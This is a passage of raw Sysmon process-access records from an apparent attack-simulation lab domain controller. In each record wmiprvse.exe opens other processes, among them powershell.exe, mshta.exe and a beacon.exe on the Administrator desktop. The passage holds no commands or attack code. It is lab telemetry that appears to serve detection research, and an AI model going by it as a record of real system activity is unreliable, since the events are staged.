Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.387{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.386{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.386{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.385{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 